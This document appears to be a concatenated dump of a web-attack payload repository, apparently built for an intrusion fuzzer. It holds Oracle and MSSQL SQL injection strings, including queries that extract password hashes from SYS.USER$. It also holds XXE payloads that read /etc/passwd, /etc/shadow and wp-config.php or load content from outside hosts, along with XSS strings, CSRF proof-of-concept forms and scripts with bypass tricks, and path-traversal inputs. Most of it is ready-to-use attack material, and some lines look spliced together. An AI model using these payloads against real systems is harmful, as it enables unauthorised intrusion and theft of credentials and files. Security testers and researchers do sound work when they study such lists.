WHERE LIMIT=7)) AND 'i'='i 48 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i 49 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i 50 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i 51 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i 52 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i 53 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i 54 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i 55 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i 56 | -------------------------------------------------------------------------------- /Web Application/XXE/Intruder/xml-attacks.txt: -------------------------------------------------------------------------------- 1 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> 2 | <!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]> 3 | <!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]> 4 | <!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]> 5 | <?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall> 6 | <?xml version="1.0"?><change-log><text>Hello World</text></change-log> 7 | <?xml version="1.0"?><change-log><text>"Hello World"</text></change-log> 8 | <?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log> 9 | <?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote """> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log> 10 | <!ENTITY systemEntity SYSTEM "robots.txt"> 11 | <change-log> <text>&systemEntity;</text> </change-log> 12 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log> 13 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log> 14 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log> 15 | <test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test> 16 | <?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-log> 17 | count(/child::node()) 18 | x' or name()='username' or 'x'='y 19 | <name>','')); phpinfo(); exit;/*</name> 20 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 21 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 22 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 23 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 24 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo> 25 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> 26 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo> 27 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo> 28 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo> 29 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" 30 | <xml ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 31 | <xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 32 | <HTML xmlns:xss><?import namespace="xss" implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></HTML> 33 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 34 | <xml ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 | <xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 36 | <?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]> 37 | ‘ 38 | “ 39 | <?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log> 40 | <?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini" >]><doc><test>Contents of file: &xxe;</test></doc> 41 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 42 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 43 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 44 | <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo> 45 | "}}</script><script>alert(1);</script></body></html>cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 56 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 57 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 58 | <?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents of file: &xxe;</test></doc> 59 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo> 60 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt">]><foo>&xxe;</foo> 61 | }}</script><script>alert(1);</script></body></html><!-- 62 | "}}</script>' 63 | }}</script>""'" 64 | <?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg> 65 | <?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg> 66 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 67 | <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> 68 | 69 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/MSSQL_TimeBased.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ');WAITFOR TIME '00:00:10'-- 8 | ');WAITFOR+DELAY+'00:00:10'-- 9 | ');WAITFOR DELAY '00:00:10'-- 10 | ) waitfor delay '0:0:20' /* 11 | ) waitfor delay '0:0:20' -- 12 | )) waitfor delay '0:0:20' /* 13 | )) waitfor delay '0:0:20' -- 14 | ))) waitfor delay '0:0:20' /* 15 | ))) waitfor delay '0:0:20' -- 16 | )))) waitfor delay '0:0:20' /* 17 | )))) waitfor delay '0:0:20' -- 18 | ))))) waitfor delay '0:0:20' -- 19 | )))))) waitfor delay '0:0:20' -- 20 | ') waitfor delay '0:0:20' /* 21 | ') waitfor delay '0:0:20' -- 22 | ") waitfor delay '0:0:20' /* 23 | ") waitfor delay '0:0:20' -- 24 | ')) waitfor delay '0:0:20' /* 25 | ')) waitfor delay '0:0:20' -- 26 | ")) waitfor delay '0:0:20' /* 27 | ")) waitfor delay '0:0:20' -- 28 | '))) waitfor delay '0:0:20' /* 29 | '))) waitfor delay '0:0:20' -- 30 | "))) waitfor delay '0:0:20' /* 31 | "))) waitfor delay '0:0:20' -- 32 | ')))) waitfor delay '0:0:20' /* 33 | ')))) waitfor delay '0:0:20' -- 34 | ")))) waitfor delay '0:0:20' /* 35 | ")))) waitfor delay '0:0:20' -- 36 | '))))) waitfor delay '0:0:20' /* 37 | '))))) waitfor delay '0:0:20' -- 38 | "))))) waitfor delay '0:0:20' /* 39 | "))))) waitfor delay '0:0:20' -- 40 | ')))))) waitfor delay '0:0:20' /* 41 | ')))))) waitfor delay '0:0:20' -- 42 | ")))))) waitfor delay '0:0:20' /* 43 | ")))))) waitfor delay '0:0:20' -- 44 | )%20waitfor%20delay%20'0:0:20'%20/* 45 | )%20waitfor%20delay%20'0:0:20'%20-- 46 | ')%20waitfor%20delay%20'0:0:20'%20/* 47 | ')%20waitfor%20delay%20'0:0:20'%20-- 48 | ")%20waitfor%20delay%20'0:0:20'%20/* 49 | ")%20waitfor%20delay%20'0:0:20'%20-- 50 | ))%20waitfor%20delay%20'0:0:20'%20/* 51 | ))%20waitfor%20delay%20'0:0:20'%20-- 52 | '))%20waitfor%20delay%20'0:0:20'%20/* 53 | '))%20waitfor%20delay%20'0:0:20'%20-- 54 | "))%20waitfor%20delay%20'0:0:20'%20/* 55 | "))%20waitfor%20delay%20'0:0:20'%20-- 56 | ,NULL)%20waitfor%20delay%20'0:0:20'%20/* 57 | ,NULL)%20waitfor%20delay%20'0:0:20'%20-- 58 | ',NULL)%20waifor%20delay%20'0:0:20'%20/* 59 | ',NULL)%20waitfor%20delay%20'0:0:20'%20-- 60 | ",NULL)%20waitfor%20delay%20'0:0:20'%20/* 61 | ",NULL)%20waitfor%20delay%20'0:0:20'%20-- 62 | ),NULL)%20waitfor%20delay%20'0:0:20'%20/* 63 | ),NULL)%20waitfor%20delay%20'0:0:20'%20-- 64 | '),NULL)%20waifor%20delay%20'0:0:20'%20/* 65 | '),NULL)%20waitfor%20delay%20'0:0:20'%20-- 66 | "),NULL)%20waitfor%20delay%20'0:0:20'%20/* 67 | "),NULL)%20waitfor%20delay%20'0:0:20'%20-- 68 | ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 69 | ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 70 | ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 71 | ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 72 | ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 73 | ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 74 | ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 75 | ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 76 | '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 77 | '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 78 | "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 79 | "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 80 | ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 81 | ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 82 | ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 83 | ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 84 | ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 85 | ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 86 | ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 87 | ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 88 | '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 89 | '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 90 | "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 91 | "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 92 | ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 93 | ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 94 | ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 95 | ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 96 | ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 97 | ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 98 | ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 99 | ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 100 | '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 101 | '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 102 | "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 103 | "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 104 | ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 105 | ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 106 | ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 107 | ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 108 | ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 109 | ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 110 | ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 111 | ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 112 | '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 113 | '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 114 | "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 115 | "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 116 | ,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 117 | ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 118 | ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 119 | ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 120 | ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 121 | ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 122 | ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 123 | '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 124 | '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 125 | "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 126 | "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 127 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 128 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 129 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 130 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 131 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 132 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 133 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 134 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 135 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 136 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 137 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 138 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 139 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 140 | ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 141 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 142 | ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 143 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 144 | ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 145 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 146 | ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 147 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 148 | '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 149 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* 150 | "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- 151 | -------------------------------------------------------------------------------- /Web Application/CSRF/README.md: -------------------------------------------------------------------------------- 1 | # CSRF 2 | 3 | La falsificación de solicitudes entre sitios (también conocida como CSRF) es una vulnerabilidad de seguridad web que permite a un atacante inducir a los usuarios a realizar acciones que no pretenden realizar. Por ejemplo, un atacante podría eludir parcialmente la misma política de origen (SOP), que está diseñada para evitar que diferentes sitios web interfieran entre sí. 4 | 5 | ## Summary 6 | 7 | * [PreRequisitos](#prerequisitos) 8 | * [Methodology](#methodology) 9 | * [Payloads](#payloads) 10 | * [Técnicas](#tecnicas) 11 | * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction) 12 | * [HTML GET - No User Interaction)](#html-get---no-user-interaction) 13 | * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction) 14 | * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction) 15 | * [JSON GET - Simple Request](#json-get---simple-request) 16 | * [JSON POST - Simple Request](#json-post---simple-request) 17 | * [JSON POST - Complex Request](#json-post---complex-request) 18 | * [Defenses](#defenses) 19 | 20 | 21 | 22 | ## PreRequisitos: 23 | 24 | Debes encontrar una funcionalidad relevante de la aplicación (change password or email, make the victim follow you on a social network, give you more privileges, etc.) 25 | 26 | ### Para que un ataque CSRF sea posible, se deben cumplir tres condiciones clave: 27 | 28 | - Una acción relevante. Hay una acción dentro de la aplicación que el atacante tiene una razón para inducir. Esta puede ser una acción privilegiada (como modificar permisos para otros usuarios) o cualquier acción sobre datos específicos del usuario (como cambiar la propia contraseña del usuario). 29 | 30 | - Manejo de sesiones basado en cookies. Realizar la acción implica emitir una o más solicitudes HTTP, y la aplicación se basa únicamente en las cookies de sesión para identificar al usuario que ha realizado las solicitudes. No existe ningún otro mecanismo para realizar un seguimiento de las sesiones o validar las solicitudes de los usuarios. 31 | 32 | - Sin parámetros de solicitud impredecibles. Las solicitudes que realizan la acción no contienen ningún parámetro cuyos valores el atacante no pueda determinar o adivinar. Por ejemplo, al hacer que un usuario cambie su contraseña, la función no es vulnerable si un atacante necesita conocer el valor de la contraseña existente. 33 | 34 | ## Methodology 35 | 36 | <img src="https://user-images.githubusercontent.com/43796175/119205068-cfbd9d80-ba5c-11eb-9078-f4fea5599023.png"> 37 | 38 | ## Payloads 39 | 40 | <img src="https://user-images.githubusercontent.com/43796175/119205115-f085f300-ba5c-11eb-9f29-a11a6f0681b9.jpg"> 41 | 42 | ### Técnicas: 43 | 44 | 1. Cambiar el método de POST a GET y eliminar el token CSRF 45 | 2. Eliminar todo el parámetro del token CSRF 46 | 3. Enviar el token CSRF junto con el ataque, ya que el backend no valida que ese token en particular esté asociado a un usuario o sesión de usuario en concreto. 47 | 4. Con el User01 ejecutar la función vulnerable a CSRF (e.g. cambio de email), capturar el token y dropear la request antes de que se realice. Con el User02 repetir la misma acción y cambiar el token por el que se ha capturado previamente del User01. Luego, se actualizará el mail del usuario User02 con un token CSRF generado por el User01. 48 | 5. Verificar si existen 2 tokens de CSRF, uno en el BODY y otro en el HEADEr. De ser así, comprobar que es posible realizar alguna funcionalidad de una víctima cambiando estos dos valores del ATACANTE por los dos valores de la VÍCTIMA. 49 | 6. Comprobar que coincidan los valores de la COOKIE enviada por el HEADER y por el BODY. Si el servidor sólo comprueba que estos valores sean iguales, sin importar qué valor se les asigne, entonces buscar una vulnerabilidad de CRFL para inyectar tu propio HEADER y enviar ambos valores de COOKIE idénticos. 50 | 7. Modifique el HEADER `Referer` y/o verifique si la aplicación devuelve un error como `Invalid referer header` cuando se explota, entonces elimine el HEADER `Referer` y valide si se acepta la modificación que intenta realizar. En su exploit ingrese `<meta name="referrer" content="no-referrer">` para evitar que la aplicación valide este encabezado. 51 | 8. Si el comportamiento anterior se genera, y el servidor no acepta la request cuando se elimina el header `Referer`, entonces intente agregar el dominio esperado por el servidor dentro de otro dominio. Ejemplo: `Referer: https://test.com/ac371f561f8fc8d4c0a13d2c001400ab.web-security-academy.net/`. Luego, si se acepta la petición, cree su exploit y agregue las dos siguientes modificaciones: 52 | 1) En el header del exploit, agregue: `Referrer-Policy: unsafe-url` 53 | 2) En el body, en la línea de código donde se declara la primera etiqueta `<script>history.pushState('', '', '/')</script>`, agregue a la función `history.pushState()` la siguiente modificación para que se incluya una cadena de consulta con la URL de su instancia: `history.pushState("", "", "/?your-lab-id.web-security-academy.net")`, esto hará que el encabezado `Referer` en la solicitud generada contenga la URL del sitio de destino en la cadena de consulta. 54 | 55 | 56 | ### HTML GET - Requiring User Interaction 57 | 58 | ```html 59 | <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a> 60 | ``` 61 | 62 | ### HTML GET - No User Interaction 63 | 64 | ```html 65 | <img src="http://www.example.com/api/setusername?username=CSRFd"> 66 | ``` 67 | 68 | ### HTML POST - Requiring User Interaction 69 | 70 | ```html 71 | <form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST"> 72 | <input name="username" type="hidden" value="CSRFd" /> 73 | <input type="submit" value="Submit Request" /> 74 | </form> 75 | ``` 76 | 77 | ### HTML POST - AutoSubmit - No User Interaction 78 | 79 | ```html 80 | <form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST"> 81 | <input name="username" type="hidden" value="CSRFd" /> 82 | <input type="submit" value="Submit Request" /> 83 | </form> 84 | 85 | <script> 86 | document.getElementById("autosubmit").submit(); 87 | </script> 88 | ``` 89 | 90 | 91 | ### JSON GET - Simple Request 92 | 93 | ```html 94 | <script> 95 | var xhr = new XMLHttpRequest(); 96 | xhr.open("GET", "http://www.example.com/api/currentuser"); 97 | xhr.send(); 98 | </script> 99 | ``` 100 | 101 | ### JSON POST - Simple Request 102 | 103 | ```html 104 | <script> 105 | var xhr = new XMLHttpRequest(); 106 | xhr.open("POST", "http://www.example.com/api/setrole"); 107 | //application/json is not allowed in a simple request. text/plain is the default 108 | xhr.setRequestHeader("Content-Type", "text/plain"); 109 | //You will probably want to also try one or both of these 110 | //xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 111 | //xhr.setRequestHeader("Content-Type", "multipart/form-data"); 112 | xhr.send('{"role":admin}'); 113 | </script> 114 | ``` 115 | 116 | ### JSON POST - Complex Request 117 | 118 | ```html 119 | <script> 120 | var xhr = new XMLHttpRequest(); 121 | xhr.open("POST", "http://www.example.com/api/setrole"); 122 | xhr.withCredentials = true; 123 | xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); 124 | xhr.send('{"role":admin}'); 125 | </script> 126 | ``` 127 | 128 | 129 | ## Defenses 130 | 131 | - SameSite cookies: If the session cookie is using this flag, you may not be able to send the cookie from arbitrary web sites. 132 | 133 | - Cross-origin resource sharing: Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may take int account the CORS policy of the victim site. Note that the CORS policy won't affect if you just want to send a GET request or a POST request from a form and you don't need to read the response. 134 | 135 | - Ask for the password user to authorise the action. 136 | 137 | - Resolve a captcha. 138 | 139 | - Read the Referrer or Origin headers. If a regex is used it could be bypassed form example with: 140 | ``` 141 | http://mal.net?orig=http://example.com (ends with the url) 142 | http://example.com.mal.net (starts with the url) 143 | ``` 144 | - Modify the name of the parameters of the Post or Get request. 145 | 146 | - Use a CSRF token in each session. This token has to be send inside the request to confirm the action. This token could be protected with CORS. 147 | -------------------------------------------------------------------------------- /Web Application/Directory Traversal/Intruder/directory_traversal.txt: -------------------------------------------------------------------------------- 1 | \..\WINDOWS\win.ini 2 | \..\..\WINDOWS\win.ini 3 | \..\..\..\WINDOWS\win.ini 4 | \..\..\..\..\WINDOWS\win.ini 5 | 